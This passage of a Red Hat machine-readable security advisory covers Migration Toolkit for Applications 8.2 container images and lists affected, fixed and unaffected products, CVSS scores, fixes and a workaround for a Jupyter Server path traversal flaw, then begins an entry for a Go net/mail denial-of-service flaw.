"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2466858"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Jupyter Server. An authenticated user can exploit a path traversal vulnerability in the REST API to escape the configured root directory (`root_dir`). By crafting a request to the `/api/contents` endpoint with encoded path components, an attacker can gain access to sibling directories whose names begin with the same prefix as the `root_dir`. This allows the attacker to read, write, and delete files in these accessible sibling directories, potentially leading to unauthorized data access and modification, especially in multi-tenant environments.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "jupyter-server: Jupyter Server: Unauthorized File Access via Path Traversal Vulnerability",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This Important flaw in Jupyter Server enables an authenticated user to bypass their configured root directory via a path traversal vulnerability in the REST API. This allows access to, and manipulation of, files within sibling directories that share a common prefix. The risk is elevated in multi-tenant Red Hat OpenShift AI environments where predictable directory naming conventions are often employed.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64"
],
"known_not_affected": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-35397"
},
{
"category": "external",
"summary": "RHBZ#2466858",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2466858"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-35397",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-35397"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-35397",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35397"
},
{
"category": "external",
"summary": "https://github.com/jupyter-server/jupyter_server/security/advisories/GHSA-5789-5fc7-67v3",
"url": "https://github.com/jupyter-server/jupyter_server/security/advisories/GHSA-5789-5fc7-67v3"
}
],
"release_date": "2026-05-05T19:37:33.810000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-21T22:10:10+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:43038"
},
{
"category": "workaround",
"details": "To mitigate this issue, ensure that directory names within Jupyter Server deployments do not share common prefixes with sibling directories. This operational control prevents authenticated users from exploiting the path traversal vulnerability to access unauthorized content. For example, avoid naming directories \u0027user1\u0027 and \u0027user10\u0027 if \u0027user\u0027 is a common prefix. This mitigation does not require service restarts or reloads.",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L",
"version": "3.1"
},
"products": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "jupyter-server: Jupyter Server: Unauthorized File Access via Path Traversal Vulnerability"
},
{
"cve": "CVE-2026-39820",
"cwe": {
"id": "CWE-606",
"name": "Unchecked Input for Loop Condition"
},
"discovery_date": "2026-05-07T20:01:27.800929+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2467820"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the `net/mail` package of the Go programming language. An attacker could provide specially crafted inputs to the `ParseAddress`, `ParseAddressList`, or `ParseDate` functions. This could lead to excessive consumption of CPU and memory resources, resulting in a Denial of Service (DoS) for applications processing these inputs.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "net/mail: golang: Go net/mail: Denial of Service via crafted email inputs",
"title": "Vulnerability summary"
},
{
"category": "other",
